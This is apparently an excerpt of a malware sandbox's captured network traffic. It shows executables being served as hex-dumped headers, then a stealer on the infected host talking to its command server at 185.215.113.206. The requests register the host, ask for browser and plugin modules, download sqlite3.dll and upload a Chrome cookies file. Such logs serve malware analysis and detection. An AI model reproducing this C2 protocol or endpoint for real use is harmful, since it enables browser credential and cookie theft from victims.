Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:41 GMTContent-Type: application/octet-streamContent-Length: 923136Last-Modified: Fri, 22 Nov 2024 19:31:16 GMTConnection: keep-aliveETag: "6740dc04-e1600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fb db 40 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 66 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 32 d8 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 d8 ab 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 ab 00 00 00 40 0d 00 00 ac 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 a0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:48 GMTContent-Type: application/octet-streamContent-Length: 2819584Last-Modified: Fri, 22 Nov 2024 19:31:41 GMTConnection: keep-aliveETag: "6740dc1d-2b0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 61 6a 65 79 72 68 79 00 c0 2a 00 00 a0 00 00 00 a6 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 73 6b 66 66 71 6f 00 20 00 00 00 60 2b 00 00 04 00 00 00 e0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 e4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:36:59 GMTContent-Type: application/octet-streamContent-Length: 2819584Last-Modified: Fri, 22 Nov 2024 19:31:44 GMTConnection: keep-aliveETag: "6740dc20-2b0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 61 6a 65 79 72 68 79 00 c0 2a 00 00 a0 00 00 00 a6 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 73 6b 66 66 71 6f 00 20 00 00 00 60 2b 00 00 04 00 00 00 e0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 e4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 22 Nov 2024 19:37:15 GMTContent-Type: application/octet-streamContent-Length: 2819584Last-Modified: Fri, 22 Nov 2024 19:31:44 GMTConnection: keep-aliveETag: "6740dc20-2b0600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 57 d5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 61 6a 65 79 72 68 79 00 c0 2a 00 00 a0 00 00 00 a6 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 71 73 6b 66 66 71 6f 00 20 00 00 00 60 2b 00 00 04 00 00 00 e0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 e4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="build"mars------EBAAFCAFCBKFHJJJKKFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 2d 2d 0d 0a Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="message"browsers------CAFBGDHCBAEHIDGCGIDA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="message"plugins------FCBFBGDBKJKECAAKKFHD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 2d 2d 0d 0a Data Ascii: ------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------KFCFBFHIEBKJKFHIEBFBContent-Disposition: form-data; name="message"fplugins------KFCFBFHIEBKJKFHIEBFB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAEHCAEGDHJKFHJKFIJHost: 185.215.113.206Content-Length: 6707Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 46 42 41 41 41 46 48 4a 44 47 43 42 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CGHCFBAAAFHJDGCBFIIJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------CGHCFBAAAFHJDGCBFIIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="file"------GDBAKKKFBGDHJKFHJJJJ--
